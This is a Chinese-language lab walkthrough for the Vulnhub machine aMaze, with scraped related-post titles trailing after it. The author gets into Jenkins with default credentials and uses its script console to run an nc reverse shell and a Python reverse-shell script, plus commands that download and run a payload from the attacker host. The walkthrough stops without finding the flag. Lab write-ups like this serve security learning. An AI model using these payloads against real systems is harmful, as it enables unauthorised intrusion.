Vulnhub靶机:aMaze

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:aMaze(10.0.2.9)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/amaze-1,573/

二、信息收集

使用nmap主机发现靶机ip10.0.2.10

使用nmap端口扫描发现靶机开放端口:21、22、80、8000

80端口使用dirsearch爆破目录,发现一个登录界面

8000端口使用dirsearch爆破目录,每爆破出什么来,打开网站是Jenkins中间件登录界面


三、漏洞利用

jenkins中间件的漏洞网上很多,但尝试了一些poc,都不行。后面尝试弱口令

jenkins/jenkins成功登录。

点击系统管理,下拉找到脚本控制台,点击脚本控制台,执行并打印系统命令

复制代码
println "whoami".execute().text

使用nc反弹shell成功,root权限

复制代码
println "nc -e /bin/bash 10.0.2.15 8888".execute().text

还可以使用python提权,将python脚本通过web上传到靶机,启动nc监听8888端口,并运行

python 复制代码
#!/usr/bin/python
# This is a Python reverse shell script

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.2.15",8888));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash","-i"]);
复制代码
#在靶机执行命令
println "wget http://10.0.2.15/shell.py".execute().text
println "python3 shell.py".execute().text

寻找不到flag

相关推荐
Bruce_Liuxiaowei1 天前
2026年4月第4周网络安全形势周报
安全·web安全·ai
胡志辉的博客1 天前
前端反调试:常见套路、识别方法与绕过思路
前端·javascript·web安全·状态模式·安全威胁分析·代码混淆
Chengbei111 天前
FOFA高级会员、DayDaymap、360Quake、Hunter测绘搜索引擎高级会员免费使用最大1W条查询
网络·安全·web安全·搜索引擎·网络安全·金融·系统安全
IT菜鸟程2 天前
网络安全实战nginx漏洞版本升级 1.28.0到1.30.0
安全·web安全
运维行者_2 天前
通过OpManager的Windows服务监控能力释放最佳IT网络性能
服务器·开发语言·网络·windows·web安全·php
你觉得脆皮鸡好吃吗2 天前
SQL注入 手工注入
网络·数据库·sql·安全·web安全·网络安全学习
一名优秀的码农2 天前
vulhub系列-83-Grotesque:1.0.1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
сокол2 天前
【网安-Web渗透测试-Linux提权】SUID提权
linux·前端·web安全·网络安全
白帽子黑客杰哥2 天前
零基础学习网络安全的五大困难
web安全·渗透测试·湖南网安基地·网安培训
李白你好2 天前
Webshell目标管理与远程会话 | 文件、命令、数据库及 Godzilla 兼容插件等能力。
web安全